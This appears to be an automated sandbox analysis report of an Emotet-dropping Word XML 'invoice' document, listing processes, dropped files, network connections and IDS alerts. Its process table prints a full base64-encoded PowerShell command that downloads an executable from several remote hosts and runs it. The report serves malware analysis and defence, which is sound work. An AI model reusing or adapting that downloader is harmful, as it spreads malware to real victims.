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 V6V9r+yQ+RBMpkF755II4DuQO+cdetL69U/l6X/Ap5ZRb0nbW34/0zzxradNm+CVfM+5lCN/09fw q9L4f1C1vpLS8i8h44mlJfO1gq7iAR1OK3Drk114Q869vfMu4dSV4yWG9FwOQOuOTTPHNzLNrH2u DUo57SYYhSKfcUGwBsgdAf1rSOIqzmoWtuYzweHp0nUUnK1vud7nOX9lJp19JaysrPGASUJIOQD3 9jVanSSPK5eRmdj1Zjkmm16Eb2V9zyJWcm47BRRRTICiiigAooooAKKKKACiiigAooooAKKKKACi iigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooJyaMHk0AFFFFABRRRQAUUU ZP4UAFFFFABRRRQAUUUUATwXctvBcRR7dlwgjfI7Ag8fiKgpetFJRSd0W5SaSZZkv5X09LJUjjhV g7CNcGRgMAse/H4c1VoooUUtglOUt2FFFFMi4UUUUAFFFFAXYtOeWR440d2ZYwQik8KCcnHpzzTK KLId2GKKKKBXCiiigA68nrRRRQAUUUUBcKMUUUAFFFFABRRRQAYHpRRRQO7CiiigLsKKKKBXYUUU UBcKKKKAuwoxRRQO7CiiigQUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUA FFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU UUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRR RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAdKKKKACiiigAooooAKKKKACii igAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA KKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAo oooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii igAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA KKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAP/Z
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:161.25pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://h0_627_.S2097_20.Z695_953
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 00005EB7
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs powershell.exe 211.exe no specs 211.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3492"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
3172"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3364powershell -e JABQADUAOQAwADQAMwA9ACgAJwB6ADMAJwArACcAXwAnACsAJwA1AF8AXwAnACkAOwAkAHUAMgBfADIAXwA2AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGQAMAAxAF8AXwAzAD0AKAAnAGgAdAB0AHAAOgAvAC8AJwArACcAOAAxAC4ANQAnACsAJwA2AC4AMQA5ADgALgAyACcAKwAnADAAMAAvAE0AcgBNACcAKwAnAEEARgAnACsAJwBXAE8AawA5AEAAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwA1ADQALgAxACcAKwAnADYANQAnACsAJwAuADIANQAzAC4AJwArACcAMQAvACcAKwAnADQAbQBCAEIATgBjAHMARwAnACsAJwBZACcAKwAnAEwAQABoAHQAJwArACcAdABwADoALwAvADUANAAnACsAJwAuACcAKwAnADIAMgA0AC4AMgAnACsAJwA0ADAAJwArACcALgAnACsAJwAzADQAJwArACcALwBMADAAUAAnACsAJwBSAG0AZQBwAGUANgBAAGgAdAB0AHAAOgAvAC8AbgBvAGkAdABoAGEAdABjAGgAdQAnACsAJwBuAGcAYwB1AGQAZQBwAC4AaQBuAGYAbwAvADQANwB1AHIAJwArACcASwBwAFgAMwBAAGgAdAB0AHAAOgAnACsAJwAvAC8AMQAyADgALgAxADkAOQAuADYAOAAuACcAKwAnADIAOAAvAFEAWgBwADUANQB4AHgAJwArACcAQwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABuAF8ANABfADAAMwAxAD0AKAAnAGsANwAnACsAJwA3ADkAJwArACcANgBfACcAKQA7ACQAbgAzAF8AXwA0ADcAIAA9ACAAKAAnADIAJwArACcAMQAxACcAKQA7ACQAaAAwAF8AMABfAF8APQAoACcAVQAnACsAJwA3ACcAKwAnAF8ANAA4AF8AJwApADsAJABCADIAXwA5ADYAOQA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABuADMAXwBfADQANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEkAMwAwADAANQBfADEAIABpAG4AIAAkAGQAMAAxAF8AXwAzACkAewB0AHIAeQB7ACQAdQAyAF8AMgBfADYALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASQAzADAAMAA1AF8AMQAsACAAJABCADIAXwA5ADYAOQA5ACkAOwAkAEEANgAzAF8ANgAyADQAPQAoACcAaQAwAF8AXwAnACsAJwA5ADQAOQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABCADIAXwA5ADYAOQA5ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAQgAyAF8AOQA2ADkAOQA7ACQAUQA1ADgAMQAzADUANgA9ACgAJwBqACcAKwAnADkAMQAzADAAJwArACcANQA0ADYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAXwA4ADcAXwA1AD0AKAAnAGkAOQBfACcAKwAnADMAMwBfACcAKQA7AA== C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3720"C:\Users\admin\211.exe" C:\Users\admin\211.exepowershell.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
EFS UI Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-
2604"C:\Users\admin\211.exe"C:\Users\admin\211.exe
211.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
EFS UI Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-
3508"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
211.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
EFS UI Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-
2752"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
EFS UI Application
Version:
6.1.7600.16385 (win7_rtm.090713-
Total events
2 042
Read events
1 628
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8E6B.tmp.cvr
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70209946.Z695_953
MD5:
SHA256:
3364powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HEK5KKFNX12HXRTQBWUT.temp
MD5:
SHA256:
3364powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3364powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199a52.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ctura-2019-090005-01-02-2019.doc.xmlpgc
MD5:2F39D3E433B30143246B5C86D4BD6FC7
SHA256:D2DEC28C69BDA910E017366283434F29AA61E3912C1549EEE5DA9195AA99DC34
3364powershell.exeC:\Users\admin\211.exeexecutable
MD5:8D3D095610DA17BFC3C799D415072054
SHA256:E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324
3172WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BCA7725C8CB9C8D63EC166E879124B21
SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73
2604211.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:8D3D095610DA17BFC3C799D415072054
SHA256:E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2752
wabmetagen.exe
GET
88.225.226.91:443
http://88.225.226.91:443/
TR
malicious
3364
powershell.exe
GET
200
81.56.198.200:80
http://81.56.198.200/MrMAFWOk9/
FR
executable
152 Kb
suspicious
3364
powershell.exe
GET
301
81.56.198.200:80
http://81.56.198.200/MrMAFWOk9
FR
html
239 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3364
powershell.exe
81.56.198.200:80
Free SAS
FR
suspicious
2752
wabmetagen.exe
88.225.226.91:443
Turk Telekom
TR
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
3364
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3364
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3364
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3364
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info